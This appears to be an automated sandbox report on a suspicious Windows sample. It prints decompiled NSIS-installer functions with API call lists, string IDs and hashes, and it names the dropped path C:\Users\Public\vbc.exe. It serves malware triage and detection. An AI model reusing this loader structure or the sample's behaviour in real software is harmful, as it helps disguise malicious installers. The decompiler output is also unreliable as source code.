              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
              • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
              • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
              • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040361A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x504d60
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x50a4d4
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x54
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























              0x00403620
              0x00403629
              0x00403630
              0x00403632
              0x00403646
              0x00403658
              0x00403662
              0x00403667
              0x0040366d
              0x00403680
              0x00403680
              0x0040368b
              0x00403634
              0x0040363f
              0x0040363f
              0x00403690
              0x00403695
              0x0040369a
              0x004036a3
              0x004036a8
              0x004036b9
              0x00403740
              0x00403748
              0x00403751
              0x00403751
              0x00403767
              0x0040376d
              0x0040377b
              0x0040380a
              0x00403812
              0x0040381c
              0x00403821
              0x00403827
              0x004038b1
              0x004038b6
              0x004038b8
              0x004038d4
              0x00000000
              0x004038d4
              0x004038ba
              0x004038c0
              0x004038c8
              0x004038c8
              0x00000000
              0x004038c0
              0x00403835
              0x00403840
              0x00403845
              0x00403847
              0x0040384e
              0x0040384e
              0x00403859
              0x00403861
              0x00403863
              0x00403865
              0x0040386e
              0x00403871
              0x00403877
              0x00403877
              0x0040387d
              0x00403896
              0x004038a7
              0x00000000
              0x004038ac
              0x00403814
              0x00403816
              0x00000000
              0x00403781
              0x00403781
              0x00403787
              0x00403791
              0x00403799
              0x004037a3
              0x004037a9
              0x004037b7
              0x004038d9
              0x004038d9
              0x00000000
              0x004038d9
              0x004037bd
              0x004037c6
              0x00403805
              0x00000000
              0x00403805
              0x004036bf
              0x004036bf
              0x004036c4
              0x00000000
              0x00000000
              0x004036c9
              0x004036ce
              0x004036de
              0x004036e3
              0x004036ea
              0x00000000
              0x00000000
              0x004036ee
              0x004036f0
              0x004036fd
              0x004036fd
              0x00403705
              0x0040370b
              0x00403733
              0x0040373b
              0x00000000
              0x0040371d
              0x0040371e
              0x00403727
              0x0040372d
              0x0040372e
              0x00000000
              0x0040372e
              0x00403729
              0x0040372b
              0x00000000
              0x00000000
              0x00000000
              0x0040372b
              0x0040370b

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040368B
              • lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
              • lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
              • GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403767
                • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
              • RegisterClassA.USER32 ref: 004037AE
              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
              • CreateWindowExA.USER32 ref: 004037FF
              • ShowWindow.USER32(00000005,00000000), ref: 00403835
              • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
              • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
              • RegisterClassA.USER32(0042E3C0), ref: 00403877
              • DialogBoxParamA.USER32 ref: 00403896
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb$`MP
              • API String ID: 1975747703-3183761240
              • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
              • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Public\\vbc.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Public";
				E00405BC7("C:\\Users\\Public", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































              0x00402c5d
              0x00402c60
              0x00402c63
              0x00402c66
              0x00402c6c
              0x00402c7d
              0x00402c82
              0x00402c95
              0x00402c9a
              0x00402c9d
              0x00402ca3
              0x00000000
              0x00402ca5
              0x00402cb0
              0x00402cb6
              0x00402cc7
              0x00402cce
              0x00402cd4
              0x00402cd6
              0x00402cdb
              0x00402cdd
              0x00402dca
              0x00402dcc
              0x00402dd1
              0x00402dd8
              0x00000000
              0x00000000
              0x00402dda
              0x00402ddd
              0x00402e01
              0x00402e06
              0x00402e0c
              0x00402e0e
              0x00402e17
              0x00402e1c
              0x00402e1f
              0x00402e20
              0x00402e21
              0x00402e23
              0x00402e28
              0x00402e2b
              0x00402e3e
              0x00402e42
              0x00402e4a
              0x00402e4f
              0x00402e51
              0x00402e51
              0x00402e51
              0x00402e59
              0x00402e59
              0x00402e5c
              0x00402e5d
              0x00402e5d
              0x00402e60
              0x00402e62
              0x00402e62
              0x00402e62
              0x00402e6c
              0x00402e72
              0x00402e80
              0x00402e85
              0x00000000
              0x00402e85
              0x00000000
              0x00402e2b
              0x00402de5
              0x00402df0
              0x00402df5
              0x00402df7
              0x00000000
              0x00000000
              0x00402dfc
              0x00402dff
              0x00000000
              0x00000000
              0x00000000
              0x00402ce3
              0x00402ce8
              0x00402ce8
              0x00402ced
              0x00402cf1
              0x00402cf8
              0x00402cfd
              0x00402cff
              0x00402d01
              0x00402d01
              0x00402d05
              0x00402d0a
              0x00402d0c
              0x00402e36
              0x00402e2d
              0x00000000
              0x00402e2d
              0x00402d12
              0x00402d19
              0x00402d95
              0x00402d99
              0x00402d9d
              0x00402da2
              0x00000000
              0x00402d99
              0x00402d22
              0x00402d27
              0x00402d2a
              0x00402d2f
              0x00000000
              0x00000000
              0x00402d31
              0x00402d38
              0x00000000
              0x00000000
              0x00402d3a
              0x00402d41
              0x00000000
              0x00000000
              0x00402d43
              0x00402d4a
              0x00000000
              0x00000000
              0x00402d4c
              0x00402d53
              0x00000000
              0x00000000
              0x00402d55
              0x00402d5b
              0x00402d64
              0x00402d6a
              0x00402d6d
              0x00402d6f
              0x00402d75
              0x00000000
              0x00000000
              0x00402d7b
              0x00402d7f
              0x00402d87
              0x00402d87
              0x00402d8a
              0x00402d8d
              0x00402d8f
              0x00402d91
              0x00402d91
              0x00000000
              0x00402d8f
              0x00402d81
              0x00402d85
              0x00000000
              0x00000000
              0x00000000
              0x00402da3
              0x00402da3
              0x00402da9
              0x00402db5
              0x00402db5
              0x00402db8
              0x00402dbe
              0x00402dc0
              0x00402dc0
              0x00402dc8
              0x00402dc8
              0x00000000
              0x00402dc8

              APIs
              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C82
                • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004058A2
                • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CCE
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`MP$soft
              • API String ID: 4283519449-4136657431
              • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
              • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
              • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
              • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402E8E, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174fileCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0xa137
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034("JUA");
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41a276
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41a276
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























              0x00402e96
              0x00402e9a
              0x00402e9d
              0x00402ea2
              0x00402ea4
              0x00402ea4
              0x00402eab
              0x00402eaf
              0x00402eb4
              0x00402eb6
              0x00402eb6
              0x00402ebd
              0x00402ec2
              0x00402ec4
              0x00402ecd
              0x00402ecd
              0x00402ed8
              0x00402edf
              0x0040305b
              0x0040305b
              0x00000000
              0x00402ee5
              0x00402ee9
              0x00403046
              0x0040309b
              0x00403060
              0x00403066
              0x00403068
              0x00403068
              0x00403079
              0x00000000
              0x0040307b
              0x0040308e
              0x00403040
              0x00403040
              0x0040305d
              0x0040305d
              0x00000000
              0x00403095
              0x00403095
              0x00403098
              0x00000000
              0x00403098
              0x0040308e
              0x00403079
              0x004030a6
              0x00000000
              0x004030a6
              0x0040304b
              0x0040304d
              0x0040304d
              0x00403059
              0x004030a3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00403059
              0x00402ef5
              0x00402ef7
              0x00402efe
              0x00402f05
              0x00402f05
              0x00402f0c
              0x00402f14
              0x00402f1e
              0x00402f23
              0x00402f2b
              0x00402f35
              0x00402f38
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402f3e
              0x00402f3e
              0x00402f3e
              0x00402f46
              0x00402f48
              0x00402f48
              0x00402f59
              0x00000000
              0x00000000
              0x00402f5f
              0x00402f62
              0x00402f68
              0x00402f6e
              0x00402f6e
              0x00402f79
              0x00402f7f
              0x00402f84
              0x00402f8b
              0x00402f8e
              0x00000000
              0x00000000
              0x00402f94
              0x00402f9a
              0x00402f9c
              0x00402fa5
              0x00402fa7
              0x00402fd5
              0x00402fdb
              0x00402fe4
              0x00402fe9
              0x00402fe9
              0x00402ff0
              0x00403034
              0x00000000
              0x00000000
              0x00000000
              0x00402ff2
              0x00402ff5
              0x00403017
              0x0040301c
              0x0040301f
              0x00403022
              0x00403025
              0x00403029
              0x00000000
              0x00000000
              0x00000000
              0x0040302f
              0x00403003
              0x0040300b
              0x00000000
              0x00403012
              0x00403012
              0x00000000
              0x00403012
              0x0040300b
              0x00402ff0
              0x0040303c
              0x00000000
              0x0040303c
              0x00000000
              0x00402f3e

              APIs
              • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EF5
              • GetTickCount.KERNEL32(JUA,00414C48,00004000), ref: 00402F9C
              • MulDiv.KERNEL32 ref: 00402FC5
              • wsprintfA.USER32 ref: 00402FD5
              • WriteFile.KERNELBASE(00000000,00000000,0041A276,7FFFFFFF,00000000), ref: 00403003
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountTick$FileWritewsprintf
              • String ID: %p, %u, %s, %p stub.$... %d%%$HLA$HLA$JUA
              • API String ID: 4209647438-634499494
              • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
              • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
              • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
              • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
